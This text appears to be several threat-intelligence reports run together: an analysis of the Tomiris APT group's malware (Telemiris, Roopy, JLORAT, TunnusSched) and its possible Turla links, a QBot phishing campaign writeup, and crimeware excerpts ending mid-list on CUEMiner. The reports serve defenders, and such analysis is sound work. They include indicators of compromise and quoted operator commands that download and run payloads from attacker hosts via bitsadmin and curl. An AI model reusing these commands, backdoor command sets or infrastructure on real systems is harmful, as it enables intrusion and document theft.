• Overall, Tomiris is a very agile and determined actor, open to experimentation – for instance with delivery methods (DNS hijacking) or command and control (C2) channels (Telegram).

The following map shows the countries where we detected Tomiris targets (colored in green: Afghanistan and CIS members or ratifiers). It is worth noting that while we identified a few targets in other locations, all of them appear to be foreign diplomatic entities of the colored countries:

Tomiris’s polyglot toolset

Tomiris uses a wide variety of malware implants developed at a rapid pace and in all programming languages imaginable. We hypothesize that the general aim is to provide operators with “full-spectrum malware” in order to evade security products. In fact, on several occasions we observed the actor persistently cycling through available malware strains until one of them was finally allowed to run on victim machines.

Tools used by Tomiris fall into three categories:

• Downloaders, rudimentary malicious programs whose role is to deploy a backdoor or required additional legitimate tools.
• Backdoors, whose feature set is typically limited to reconnaissance, command execution, file download and file upload.
• File stealers specifically built to exfiltrate documents, often relying on a hardcoded list of file extensions to automatically find recently edited files and upload them to a C2. Some file stealers are backdoor variants and share the same code base.

Tomiris goes after its victims using a wide variety of attack vectors: spear-phishing emails with malicious content attached (password-protected archives, malicious documents, weaponized LNKs), DNS hijacking, exploitation of vulnerabilities (specifically ProxyLogon), suspected drive-by downloads and other “creative” methods (see details of the investigation described below). The following table lists all Tomiris malware families we are aware of:

Name Type Language Comments Tomiris Downloader Downloader C Mentioned in our original blog post.
Some samples contain traces of Russian language. Tomiris (Golang implant) Backdoor Golang Described in our original blog post. SBZ[1] filestealer File stealer Golang Document stealer based on Tomiris’s (Golang implant) source code. Tomiris download scheduler Downloader C A variant of Tomiris Downloader that additionally uses scheduled tasks to download a payload. Tomiris .NET downloader Downloader .NET A .NET variant of Tomiris Downloader, mainly used to deploy required legitimate tools, such as WinSCP. Telemiris Backdoor Python Contains traces of Russian language. Roopy File stealer Pascal Similar to SBZ filestealer (see above). JLORAT Backdoor Rust Various traces of Russian language in this family. JLOGRAB File stealer Rust Based on JLORAT’s source code.

In addition, Tomiris leveraged open-source or commercially available implants and offensive tools. Notably, the latter were associated with Tomiris because they were downloaded from Tomiris downloader, shared a common C2 with other Tomiris implants, and/or were leveraged to deploy other Tomiris implants:

Name Description RATel Open-source RAT available on GitHub.

One of the samples (MD5 10B315FB7D8BA8D69337F04ED3891E75) that we attributed to Tomiris was downloaded from mail.mfa.uz.webmails[.]info, which has been referenced by Cyjax. Python Meterpreter loader Metasploit-provided Python script that is leveraged to deploy a Meterpreter instance in memory. These are frequently packed using py2exe, PyInstaller or Nuitka. Warzone RAT A commercial C++ RAT.

Relationships between Tomiris tools. Arrows indicate direct execution.

Overall, pieces from the Tomiris toolset appear to be generally interchangeable and don’t appear to be tied to specific campaigns or victims. Operators routinely mix and match the various families, trying to deploy tools (often repeatedly) with little regard for stealth until one doesn’t get caught by antivirus software.

The following paragraphs provide a summary description of the main malware strains used by Tomiris.

Telemiris

Telemiris is a Python backdoor originally packed with PyInstaller (we later identified some Nuitka-packaged samples as well). Its name derives from the fact that it uses Telegram as a C2 channel. After setting up persistence (copying itself under %AppData%/service/ and creating a RUN key entry), the malware enters its main loop where it waits for Telegram messages and replies to them. Supported commands are:

/run Execute an arbitrary command on the victim’s machine. It’s worth noting that command results are expected to be encoded in Cyrillic codepage. /download <path> Sends the contents of the file stored on the victim’s machine at the given path. [file attachment] Writes the received file on the victim’s machine at the path specified in the attachment’s caption, or in the current directory by default. Telemiris replies with “Файл загружен!” (“File downloaded!”).

From what we observed, Telemiris is used as a first-stage implant that operators use to deploy other tools such as Roopy, JLORAT, or even the legitimate WinSCP binary, to further exfiltrate files.

Roopy

Written in Pascal, this file stealer crawls the victim’s filesystem at regular intervals and uploads all files of interest to its C2 server. At startup, it wastes CPU cycles on dead code and useless loops, which we assume are for evasion purposes. Roopy then creates its working directory (%AppData%/Microsoft/OneDrive) where it stores the list of already uploaded files (as upload.dat) and a copy of documents waiting to be uploaded (in the backup subfolder).

Then, every 40-80 minutes, Roopy crawls C:\Users and all other drives (D:, E:, …), looks for all documents (.doc, .docx, .xls, .xlsx, .txt, .pdf) modified in the last month, and stages them for upload. Discovered files are collected in ZIP archives up to 5MB in size and sent to the C2 server over plain HTTP using POST requests containing such data as:

{ "n":"[timestamp]_[part].zip", "t":"[computer name]", "s": "[timestamp]", "b64":"[base64-encoded zip file]" }

This data format, naming convention as well as the URL scheme used by the C2 server (i.e., /h/pa) are very similar to SBZ filestealer. We identified a number of variants of Roopy where logging can be either enabled or disabled by default, or where the base64 encoding scheme was replaced by a simple subtraction from the bytes of the obfuscated data.

JLORAT

Our first sightings of this Rust malware date back to August 2022. Similar to Telemiris, JLORAT copies itself under %AppData% and sets up persistence via a registry RUN key. It also creates a mutex to ensure atomic execution (“whatever”, as in the default usage example for the “single-instance” Rust library that is embedded). The backdoor starts by gathering information on the victim machine, such as the system information, current user and public IP address. The information is sent via an HTTP POST request to the C2 on a non-standard port (i.e., 9942). Sample data sent by the C2 could be:

{ "admin": true, "cmd": "", "cpu_vendor": { "brand": "[REDACTED]", "cores": 6, "cpu_usage": 0, "frequency": 2400, "name": "CPU 6", "vendor_id": "[REDACTED]" }, "hwid": "[REDACTED]", "ip": "[REDACTED]", "memory": "32.0", "resolution": "1280x1024", "software": [ "Microsoft Visual C++ 2005 Redistributable (x64)", "[REDACTED, list of further installed software items]" ], "username": "[REDACTED]", "version": "Windows 7 Professional" }

JLORAT then looks for specific keywords in the data returned by the C2 to start processing orders.

0 No operation cmd|[command] Executes the specified command, and returns the result in the cmd key of the JSON response. Some specific subcommands are processed by JLORAT directly and not passed to the command prompt, such as cmd|cd (change working directory), cmd|ls or cmd|dir (lists file in the current directory) and cmd|curfile (returns the path to the JLORAT binary). upload|path Sends the designated file from the victim to the C2, on TCP port 9999. download|url|path Saves the file at the given URL to the provided path on the victim’s machine. screen Takes a screenshot and sends it to the C2 on TCP port 9999.

Data sent to port 9999 is not passed in a JSON dictionary, but instead follows a specific format:

Offset Field name Description 0 FILENAME_LEN Length of the filename of the data being sent 4 FILENAME Name of the file being sent 4 + FILENAME_LEN CONTENT_LEN Length of the data 8 + FILENAME_LEN CONTENT Payload

We also discovered variants of JLORAT bundled with additional modules – effectively turning it into a file stealer we call JLOGRAB. Just like Roopy, JLOGRAB:

• Periodically looks for documents (a combination of.txt, .pdf, .xml, .xlsx, .doc and .docx files depending on the sample)
• Saves the list as %AppData%/temp_id.txt
• Copies discovered documents under %AppData%/transport
• Uploads them to the C2 in ZIP archives.

JLORAT contains traces of Russian language in status messages (“Директория установлена!”, meaning “Directory set”). The source binary also contains metadata indicating some of the source code is stored in a “moduls” folder, which appears to be a misspelling of the English word “modules”, or a poor transliteration of the Russian word “модуль” (pronounced: modul’).

Tomiris’s deployment spree: TunnusSched giveaway

On January 5, 2023, Mandiant released a blog post describing attacks against Ukrainian entities that they attributed to Turla. Let’s start by briefly summing up their findings:

• In September 2022, a threat actor purchased an expired domain name (anam0rph[.]su) that used to be part of a botnet (Andromeda) infrastructure. This allowed them to receive incoming connections from previous, dormant infections and take over a number of machines.
• Victims in Ukraine were infected with KopiLuwak and QUIETCANARY, two malware strains previously associated with Turla.

While publicly available data indeed shows that anam0rph[.]su was re-registered on August 12, 2022, we couldn’t find any link between Andromeda and KopiLuwak from our telemetry. Nevertheless, we had been tracking QUIETCANARY since 2019 under the name “TunnusSched” (not “Tunnus” as Mandiant’s reporting indicates), and decided to take a closer look at samples collected during the same period.

To our great surprise, we discovered one TunnusSched/QUIETCANARY sample (MD5 B38160FC836AD42F1753A0873C844925) had been delivered to a government target in the CIS on September 13, 2022. Our telemetry additionally shows that this TunnusSched malware was deployed…from Tomiris’s Telemiris (MD5 C49DBF390E876E926A338EA07AC5D4A7).

More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy. These efforts were thwarted by security products, which led the attacker to make repeated attempts, from various locations on the filesystem:

$> bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar [REDACTED]\lsasss.rar $> rar.exe x "[REDACTED]\lsasss.rar" "[REDACTED]\" $> [REDACTED]\lsasss.exe $> dir "[REDACTED]\ $> del "[REDACTED]\document.rar" $> [...] $> wmic list drives $> wmic diskdrive get name $> wmic logicaldisk where drivetype=5 get deviceid, volumename, description $> wmic logicaldisk where drivetype=3 get deviceid, volumename, description $> [...] $> bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar F:\lsasss.rar $> rar.exe x "F:\lsasss.rar" "F:\" $> F:\lsass.exe $> tasklist | findstr /I "lsasss"

All these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using a TunnusSched/QUIETCANARY sample:

curl hxxps://crane[.]mn/wp-content/plugins/jetpack/modules/photon-cdn/EpsonDeviceControl.exe –output [REDACTED]\epsondevicecontrol.exe

The TunnusSched sample was blocked as well, and the operator resumed trying to deploy JLORAT and Roopy samples up to the next day. This activity and brute-force approach to infection is completely consistent with other Tomiris infections we have observed in the past.

Attribution: reading KopiLuwak’s story again

Mandiant noted that some elements of the recent TunnuSched case they analyzed “appear to be a departure from historical Turla operations”, but the use of KopiLuwak and TunnusSched led them to link this activity to Turla anyway. In order to perform a critical analysis of this attribution process, we need to go back in time.

KopiLuwak has belonged to Turla

Kaspersky first reported on KopiLuwak in 2016. Back then, this JavaScript reconnaissance tool was used to deploy ICEDCOFFEE in countries like Greece, Romania and Qatar. We attributed the associated attack campaign to Turla and could not find any reason to believe that was incorrect.

TunnusSched and KopiLuwak are part of the same toolset

Starting from 2019, we discovered additional implant families that were linked to KopiLuwak (and so, to Turla), starting from 2019. The implants were additionally linked together, mainly because they leverage an identical RC4 implementation:

Malware name Links to Turla Topinambour

• Delivered KopiLuwak samples
• Shared TTPs (use of compromised WordPress sites)
• Same RC4 implementation as Tunnus and TunnusSched

Tunnus

• Found on machines infected with KopiLuwak
• Shared TTPs (use of compromised WordPress sites)
• Same RC4 implementation as TunnusSched and Topinambour

TunnusSched
(QUIETCANARY)

• Shared PDB path with Tunnus
• Same RC4 implementation as Tunnus and Topinambour

RocketMan

• Found on machines infected with Topinambour
• Code similarities with TunnusSched

Code similarity between Topinambour (left) and TunnusSched (right)

The RC4 implementation in these samples results in strictly identical .NET bytecode that, as far as we could verify, is unique to Tunnus, TunnusSched and Topinambour.

The fact that all these implants are interconnected leaves little doubt, and Topinambour at least is strongly linked with KopiLuwak. As a result, we (still) believe with high confidence that TunnusSched and KopiLuwak are both part of similar toolsets, starting from 2019 at the latest.

Mandiant’s recent findings also confirm that KopiLuwak and TunnusSched were still part of the same toolset as of September 2022, as they were both deployed against targets in Ukraine during a single operation.

But Tomiris uses TunnusSched

As we recently discovered (and detailed in “Tomiris’s deployment spree: TunnusSched giveaway”), TunnusSched was leveraged by Tomiris against a government target in the CIS in September 2022.

Additionally, we believe with medium confidence the TunnusSched usage described by Mandiant to be part of Tomiris’s operations, because:

• The TunnusSched sample that was leveraged by Tomiris (MD5 B38160FC836AD42F1753A0873C844925) is very similar to the one that was deployed from KopiLuwak as per Mandiant’s reporting (MD5 403876977DFB4AB2E2C15AD4B29423FF). Most notably, they share identical RC4 encryption keys, user agent strings, unused code (the “ServerInfoExtractor” class), PDB root path (“c:\Users\Scott\source\repos\Kapushka.Client\BrowserTelemetry\obj\Release\”, starting with a lowercase “c:”), both have explicit references to VisualStudio 15.7, and a compilation date set to September 2022.
• The TunnusSched sample used by Tomiris and the one referenced by Mandiant were both (only) deployed against targets in the CIS during the same timeframe (September 2022).
• The TunnusSched deployment described by Mandiant involved taking over an extinct Andromeda C2 domain. We first introduced Tomiris as a threat actor who took over legitimate government hostnames to deploy the Tomiris Golang implant, and it has continued to do so. As a result, we believe it is likely Tomiris may have hijacked extinct Andromeda hostnames or domains.

So Tomiris uses KopiLuwak!

As we have already established, TunnusSched and KopiLuwak are part of similar toolsets (starting from 2019 at least). They were also used together during the same operation in September 2022 in the CIS, while TunnusSched was also deployed separately by Tomiris in the CIS – both independently analyzed cases leveraging very similar TunnusSched samples.

As a result, we believe with medium-to-high confidence that both TunnusSched and KopiLuwak are being leveraged by Tomiris. Additionally, we cannot rule out Tomiris having used KopiLuwak as early as 2019, conducting operations that may have been wrongly attributed to Turla back then.

Wait: wouldn’t that mean Tomiris IS Turla?

This entire discussion would be moot if we believed Tomiris to be (a sub-cluster of) Turla – but this is not the case. While our initial blog post introducing Tomiris noted similarities with malware used in the SolarWinds incident, we continued to track the two sets of activity separately. Years later, we are convinced that despite possible ties between the two groups, Turla and Tomiris are separate actors. Tomiris is undoubtedly Russian-speaking, but its targeting and tradecrafts are significantly at odds with what we have observed for Turla. In addition, Tomiris’s general approach to intrusion and limited interest in stealth are significantly at odds with documented Turla tradecraft.

It follows that two groups (that we know of) may have used KopiLuwak at different points in time. What are the possible explanations for this?

• It is possible that Turla doesn’t mind using a tool that was burned in 2016 and is still using it in current operations along with new tools.
• Given that KopiLuwak, Tunnus, TunnusSched, etc. are written in JavaScript and .NET, where the source code is essentially provided with the malware, other threat actors may have repurposed these tools and are using them under a false flag.
• Turla shares tool and expertise with Tomiris, or cooperates with Tomiris on joint operations. In this scenario, it might be acceptable for Turla to give away burned tools, or to use old implants that will not disclose current capabilities to their partners.
• Tomiris and Turla rely on a common supplier that provides offensive capabilities. Or maybe Tomiris initially started out as a private outfit writing tools for Turla and is now branching out into the mercenary business. If so, it is entirely possible that Tomiris, using the toolset it developed for Turla, is conducting operations for different customers.

Our assessment is that the first two hypotheses are the least likely and that there exists a form of deliberate cooperation between Tomiris and Turla. Its exact nature is, however, hard to determine with the information we have at hand. In any case, depending on when Tomiris started using KopiLuwak, a number of campaigns and tools believed to be linked to Turla may in fact need to be re-evaluated.

Not only Topinambour, Tunnus, TunnusSched (QUIETCANARY) and RocketMan may have been used by Tomiris in the past (we know this is the case for TunnusSched, and very likely for Tunnus due to the discovery of government victims in Russia in 2019), it could also be the case that these tools are Tomiris’s exclusive property. Looking back, we cannot help but notice that all of these tools were predominantly used in the CIS region, which is consistent with Tomiris’s traditional victimology.

Conclusion

With this report, we hope to alert the community to the dangers of using KopiLuwak and TunnusSched to link cyberattacks to Turla. To the best of our knowledge, this toolset is currently shared between Tomiris and Turla and we cannot rule out that more actors outside our purview have access to it. We expect the attribution of this cluster of activities to remain unclear for the near future.

In the grander scheme of things, this investigation reveals the pitfalls that the information security industry faces when working on cyberattacks. We rely on a knowledge pool generously shared among all participants, yet information decays: what is true today may turn out to be wrong tomorrow. Discovering new, reliable data isn’t enough; existing assumptions also need to be substantiated – which can only happen when vendors publish data. In that spirit, we kindly thank Mandiant for the research they published.

Finally, this investigation illustrates the limits of technical attribution. Looking at infections and malware samples only gets us so far and we are often reminded that APT groups are subject to organizational and political constraints. On rare occasions, we stumble upon a piece of the puzzle that allows us to pierce the veil.

As for the Tomiris mystery, we’ll be eagerly awaiting the next piece.

Indicators of compromise

Telemiris
MD5 edb0c08f8b6bb179b4395d8a95619d07
SHA-1 f8d87d5b251671af624c3eaf7ac5cc42a0acadd0
SHA-256 00466d76832193b3f8be186d00e48005b460d6895798a67bc1c21e4655cb2e62

MD5 c49dbf390e876e926a338ea07ac5d4a7
SHA-1 bc9314760071a4aef12e503104478059808e7047
SHA-256 df75defc7bde078faefcb2c1c32f16c141337a1583bd0bc14f6d93c135d34289

MD5 485a08c6ff6a8b05fab42facc0225035
SHA-1 da6635def86b50a5de25f148426f68d3d8ab450a
SHA-256 fd7fe71185a70f281545a815fce9837453450bb29031954dd2301fe4da99250d

Tomiris Golang implant
MD5 6b567779bbc95b9e151c6a6132606dfe
SHA-1 a0de69ab52dc997ff19a18b7a6827e2beeac63bc
SHA-256 80721e6b2d6168cf17b41d2f1ab0f1e6e3bf4db585754109f3b7ff9931ae9e5b

SBZ filestealer
MD5 51aa89452a9e57f646ab64be6217788e
SHA-1 0b6e1df37ba89d3d35b4b18afc0ffeb46644ff76
SHA-256 cb78495bee37e768ef4566aa1c2cfb5478bae779127430f90c3da75e407350b8

MD5 20c9ca66d2844edb94a623e77accaa5f
SHA-1 752678274224bf9fef83843e44820f6bcd738758
SHA-256 0767806f5734dca1553cae6a835c24a6d92abd678928b64f70dbd8811ed44aca

TunnusSched
MD5 5d6b920fd8f3b5a3a8c9dead25e3a255
SHA-1 902b27a5fd2e5f17e5340e350afa037549ce9faa
SHA-256 0fc624aa9656a8bc21731bfc47fd7780da38a7e8ad7baf1529ccd70a5bb07852

MD5 4452290e674ab521fa0941d45cc6b22f
SHA-1 459b17c42017cfdfc7eb804b5c0ee52aa6035d78
SHA-256 3f94b20cb7f4ff55207660649ebbb02679c991fe03efbcb0bd3840fc7f0bd527

MD5 e59752ffc116388dd863fc2e30e4aaea
SHA-1 98059a86b681b0b8a09a95def3ef874c531b1d66
SHA-256 29314f3cd73b81eda7bd90c66f659235e6bb900e499c9cc7057d10a9083a0b94

Topinambour
MD5 47870ff98164155f088062c95c448783
SHA-1 15e710a107830b193124a6d2bbc785b9383262a9
SHA-256 009406c1c7c0b289a25d44dfaa8364633d9b71df5f3c7a65deec1ef00a8c2ebb

RocketMan
MD5 a80bbd753c07512b31ab04bd5e3324c2
SHA-1 7bb6e4a1ede35867ce5c57b5668f6aacae025b81
SHA-256 046f11a6c561e46e6bf199ab7f50e74a4d2aaead68cdbd6ce44b37b5b4964758

Tunnus
MD5 9be1cccd8e6ff0bd2ad7868a7c1308c0
SHA-1 0be035e2d7180a908566a6bdaa907ed74b08b790
SHA-256 85295ab44d0903a2cf4cbdcae55129a40cf5f7fb7210a304fa91a86929fd2cd9

Roopy
MD5 66357e47bbc2ec5694e2c5de9cc3b9c6
SHA-1 ce9db7dbf3368757c232aa960bbfa7b83278618d
SHA-256 0dfbc54a5a88f27e52807873c20872bc6bf92b822de90545492081c4e4f96778

MD5 d3e1043cf5382e97685340760c9d3d61
SHA-1 90f1e9fb5845f985cd0995c75e0746a8e47cf8e9
SHA-256 9c086f242120be7a9e57e06b75d8ef6f051a77c6339deaeb574e80ee69590111

MD5 0f092bfc9f9adaf93750df4ae3cdc0f7
SHA-1 e2f191b251ba5c57cdbb5a6d3bfab57957900fcf
SHA-256 a4ea3462bd5aedccc783d18d24589018c257b2a6e092164c01de067a8e3cd649

JLORAT
MD5 8674100d43231294b6562717a9ab3a07
SHA-1 f918e5f50bb3b73a732bc9cb3595bff2ea7b761f
SHA-256 296599df29f4ffa9bf753ff9440032d912969d0bab6e3208ab88b350f9a83605

MD5 d09f792e5ea9f1239f3454fd1ce7893c
SHA-1 9902917a3af585e695141caf347a2f19a065a7df
SHA-256 69bb729ff354cd9651f99a05f74f3ea20d483dc8e6e5838e4dd48858fd500d29

Tomiris Downloader
MD5 fd59dd7bb54210a99c1ed677bbfc03a8
SHA-1 292c3602eb0213c9a0123fdaae522830de3fad95
SHA-256 c9db4f661a86286ad47ad92dfb544b702dca8ffe1641e276b42bec4cde7ba9b4

MD5 bcd52718195416b47c3538a89b62c305
SHA-1 5a368354696d06319a050071f48bc6767d92b49a
SHA-256 8391c182588b79697337e401a6424c12b3d707c00c15a17ec59059deedb0e2c4

MD5 daf4f59224cc7c5e94c924f43a76f300
SHA-1 6161aa9d9888472647a9792eead944bfc678c920
SHA-256 8ec159179d49b44849febe7ed522c8fb836d5658ef868db41d2181fb4b1cbd3f

MD5 d1986646b9be824414845f8e98c7961b
SHA-1 98f1a215cd87e08d33f0d2ba13020661e629c6b8
SHA-256 b144229fb62799aa23537eaf0ce267b1445a182c28f4679e8f8234eeb5e603f3

MD5 45a857603e0e72174452fd073ad373de
SHA-1 c1b7547da13b7c78cd6c5c354af945b2eff767c9
SHA-256 e2d4d030542a44a8d4cc8b97da7b26487570dda432a736766dd2ab6d57a3b787

Tomiris .NET Downloader
MD5 11ed3f8c1a8fce3794b650bbdf09c265
SHA-1 4040bb7e4ebc98c22bda98680b207ec89767b759
SHA-256 4f237b5aa3ff4fc4e3014f693c27a1cba94fc24f3a6054c28d090592343c06a2

MD5 92c6d7fb1118d2e276dd4ad878db37f6
SHA-1 53baccf15963dc85447cc822ec95ef8ed0326ac6
SHA-256 358411a3b4a327805d629612b1b64357efe5389e56ddae9128ababbc8a2357a1

MD5 796c232286743b95fed38d9d5c74f879
SHA-1 cac58134db8bb3c6b0d8f21957cadb9110fa3727
SHA-256 65da1696d36da254779a028b881a1890b0b037e7eee8ea0a9446c8bb0729c1cf

Tomiris Download Scheduler
MD5 956cefc9a1759078ccf75b192db10ced
SHA-1 245b78c615c57abaf46235f184a727587c882b69
SHA-256 c5a9be4055e5f00bf3f2e6c57ba1b796157a74406657fd554d69491868cd5925

MD5 67340dba1c379a84df88e639608de310
SHA-1 aa494696a413b652e667cbbb7ccee35a68b45c87
SHA-256 5e66256adbf973f6ab2252c14d6f0d8da2d326f52f6433bcf3a7cd7c60ae8f01

RATel
MD5 d83b31fe5f0144468aad4619c2418ac8
SHA-1 23f388aced4b1732744cbd5fca1a24b8a82c01a9
SHA-256 e152322530819d196fb411a0cb12cf4bcc94975b400a17b95f0fc2e28f6493e5

MD5 447cf4a077f17096ca16a29333b7a046
SHA-1 4a572e67a799ebbb2b9d7260aedb780e3005be51
SHA-256 352f9cd4c14c1002d6c8d902cbca4e96d03a8bb243b33dd192a2260fe66091a1

MD5 10b315fb7d8ba8d69337f04ed3891e75
SHA-1 c56991857a9c09e25f3dd56066b4a322cc5c03d9
SHA-256 4c8eddeab2d40178712685d09da5187b996389fba62c7f9b9635b07060b1e013

Packed Python Meterpreter loader
MD5 322837acdcedc952587e7be9886ddffd
SHA-1 19357154ff3e43c968fd09f61db1e6e8084384fa
SHA-256 98275bfe968d5998230bdf18de1be795b5ad42bd82b5ecb1405b00afba6f533d

MD5 778d491e9742199b558e84a27c559612
SHA-1 66271b2536481a6b2a3ae21412ce5ef50a692cfa
SHA-256 9cd10a2d9db9cf1c5b3454c323fd148f5a322b4100f35e0a73ed4632038631cc

 

[1] Name is directly extracted from strings in binary samples. Despite similarity to the “STAITBIZARRE” implant (also sometimes called “SBZ”), it is completely unrelated.

In early April, we detected a significant increase in attacks that use banking Trojans of the QBot family (aka QakBot, QuackBot, and Pinkslipbot). The malware would be delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French. The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own. As a general rule, such letters would be urging the addressee — under a plausible pretext — to open an enclosed PDF file. As an example, they could be asking to provide all the documentation pertaining to the attached application or to calculate the contract value based on the attached cost estimate.

Example of a forwarded letter containing a malicious attachment

Such simulated business correspondence can obstruct spam tracking while increasing the probability of the victim falling for the trick. For authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field; however, the sender’s fraudulent e-mail address will be different from that of the real correspondent.

A short look at QBot

The banking Trojan QBot was detected for the first time in 2007. Since then, it has gone through multiple modifications and improvements to become one of the most actively spread malware in 2020. In 2021, we published a detailed QBot technical analysis. Currently the banker keeps getting new functions and module updates for increased effectiveness and profit.

QBot distribution methods have also evolved. Early on it was distributed through infected websites and pirated software. Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings.

QBot infection chain

New QBot infection chain

The QBot malware delivery scheme begins with an e-mail letter with a PDF file in the attachment being sent. The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert advising the user to click Open to view the attached files. If the user complies, an archive will be downloaded from a remote server (compromised site), protected with a password given in the original PDF file.

Examples of PDF attachments

In the downloaded archive there is a .wsf (Windows Script File) file containing an obfuscated script written in JScript.

Obfuscated JScript

After the WSF file is deobfuscated its true payload gets revealed: a PowerShell script encoded into a Base64 line.

Encoded PowerShell script

So, as soon as the user opens the WSF file from the archive, the PowerShell script will be discretely run on the computer and use wget to download a DLL file from a remote server. The library’s name is an automatically generated alphabetic sequence varying from one victim to another.

Decoded PowerShell script

The PowerShell script will try in succession to download the file from each one of the URLs listed in the code. To figure whether the download attempt was successful, the script will check the file size using the Get-Item command to get the information. If the file size is 100,000 bytes or more, the script will run the DLL with the help of rundll32. Otherwise, it will wait for four seconds before attempting to download the library using the next link down the list. The downloaded library is the Trojan known as QBot (detected as Trojan-Banker.Win32.Qbot.aiex).

Technical description of malicious DLL

We have analyzed the Qbot samples from the current e-mail campaign. The bot’s configuration block features company name “obama249” and time stamp “1680763529” (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers. Most of these addresses belong to those users, whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.

Qbot’s functionality hardly changed in the past couple of years. As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system. Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.

Statistics

We have analyzed the QBot attack statistics collected using Kaspersky Security Network (KSN). According to our data, the first letters with malicious PDF attachments began to arrive in the evening of April 4. The mass e-mail campaign began at 12:00 p.m. on the following day and continued until 9:00 p.m. During that time we detected an approximate total of 1,000 letters. The second upsurge began on April 6, again at noon, with over 1,500 letters dispatched to our customers this time. For the next few days new messages kept coming, and soon, on the evening of April 12 we discovered another upsurge with 2,000 more letters sent to our customers. After that cybercriminal activity went down, but users still receive fraudulent messages.

Geography of Qbot family attacks, April 1–11, 2023 (download)

In addition, we checked which countries were targeted by Qbot the most by relating the number of users attacked in a given country against the total number of users attacked worldwide. It turned out, the bank Trojan QBot was a more common issue for the residents of Germany (28.01%), Argentina (9.78%), and Italy (9.58%).

Qbot indicators of compromise MD5

PDF files
253E43124F66F4FAF23F9671BBBA3D98
39FD8E69EB4CA6DA43B3BE015C2D8B7D

ZIP archives
299FC65A2EECF5B9EF06F167575CC9E2
A6120562EB673552A61F7EEB577C05F8

WSF files
1FBFE5C1CD26C536FC87C46B46DB754D
FD57B3C5D73A4ECD03DF67BA2E48F661

DLL
28C25753F1ECD5C47D316394C7FCEDE2

Malicious links

ZIP archive
cica.com[.]co/stai/stai.php
abhishekmeena[.]in/ducs/ducs.php

DLL
rosewoodlaminates[.]com/hea/yWY9SJ4VOH
agtendelperu[.]com/FPu0Fa/EpN5Xvh
capitalperurrhh[.]com/vQ1iQg/u6oL8xlJ
centerkick[.]com/IC5EQ8/2v6u6vKQwk8
chimpcity[.]com/h7e/p5FuepRZjx
graficalevi.com[.]br/0p6P/R94icuyQ
kmphi[.]com/FWovmB/8oZ0BOV5HqEX
propertynear.co[.]uk/QyYWyp/XRgRWEdFv
theshirtsummit[.]com/MwBGSm/lGP5mGh

Introduction

Although ransomware is still a hot topic on which we will keep on publishing, we also investigate and publish about other threats. Recently we explored the topic of infection methods, including malvertising and malicious downloads. In this blog post, we provide excerpts from the recent reports that focus on uncommon infection methods and describe the associated malware.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RapperBot: “intelligent brute forcing”

RapperBot, based on Mirai (but with a different C2 command protocol), is a worm infecting IoT devices with the ultimate goal to launch DDoS attacks against non-HTTP targets. We observed the first sample in June 2022, when it was targeting SSH and not Telnet services. The latest version, however, removed the SSH functionality part and now focuses exclusively on Telnet—and with quite some success. In Q4 2022, we noticed 112k RapperBot infection attempts coming from over 2k unique IP addresses.

What sets RapperBot apart from other worms is its “intelligent” way of brute forcing: it checks the prompt and, based on the prompt, it selects the appropriate credentials. This method speeds up the brute forcing process significantly because it doesn’t have to go over a huge list of credentials.

RapperBot then determines the processor architecture and infects the device. The downloading of the actual malware is done via a variety of possible commands (for example, wget, curl, tftp and ftpget). If for some reason these methods don’t work, then a malware downloader is uploaded to the device via the shell “echo” commands.

Rhadamanthys: malvertising on websites and in search engines

Rhadamanthys is a new information stealer first presented on a Russian-speaking cyber criminal forum in September 2022 and offered as a MaaS platform. According to the author, the malware:

• Is written in C/C++, while the C2 is written in Golang.
• Is able to do a “stealthy” infection.
• Is able to steal/gather information on CPU type, screen resolution, supported wallets, and so on.
• Evades EDR/AV.
• Has encrypted communication with the C2.

Despite the malware being advertised already in September 2022, we started to detect the first samples at the beginning of 2023. Although Rhadamanthys was using phishing and spam initially as the infection vector, the most recent method is malvertising.

Online advertising platforms offer advertisers the possibility to bid in order to display brief ads in search engines, such as Google, but also websites, mobile apps and more. Both search engine and website-based ad platforms are leveraged by Rhadamanthys. The trick they pull is to display ads representing legitimate applications but in fact containing links to phishing websites. These phishing websites contain fake installers, luring users into downloading and installing the malware.

While analyzing Rhadamanthys, we noticed a strong connection with Hidden Bee miner. Both samples use images to hide the payload inside and both have similar shellcodes for bootstrapping. Additionally, both use “in-memory virtual file systems” and utilize Lua to load plugins and modules.

Comparison between Rhandamanthys’s “prepare.bin” and Hidden Bee’s “preload” modules

CUEMiner: distribution through BitTorrent and OneDrive

In August 2021, a project was started on GitHub called SilentCryptoMiner, hosting the miner consisting of a downloader and the payload, bot source and the compiled builder, as well as additional software, such as a system watcher. It has been constantly updated, with the latest update going back to October 31 2022. The repository is popular with cybercriminals, as illustrated by the huge number of samples we detected that featured many small changes and were combined with the different URLs and TTPs, making it clear that the malware is used by multiple groups in various ways concurrently.

During our investigation, we noticed two methods of spreading the malware. The first is via trojanized cracked software downloaded via BitTorrent. The other method is via trojanized cracked software that is downloaded from OneDrive sharing networks. How victims are lured into downloading these cracked packages is speculation, because we couldn’t find any direct links. Nevertheless, many crack sites these days do not immediately provide downloads. Instead, they point to Discord server channels for further discussion. This suggests some form of human interaction and social engineering.

The downloader is written in .NET and called CUEMiner. Despite being written in .NET, it is wrapped by a C++ based dropper and it connects to a set of URLs, which is varying from sample to sample, to download the miner and configuration settings. It also performs several checks in order to ensure it is running on bare metal systems, and not on a virtual machine. In case all checks are passed, the malware:

• Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
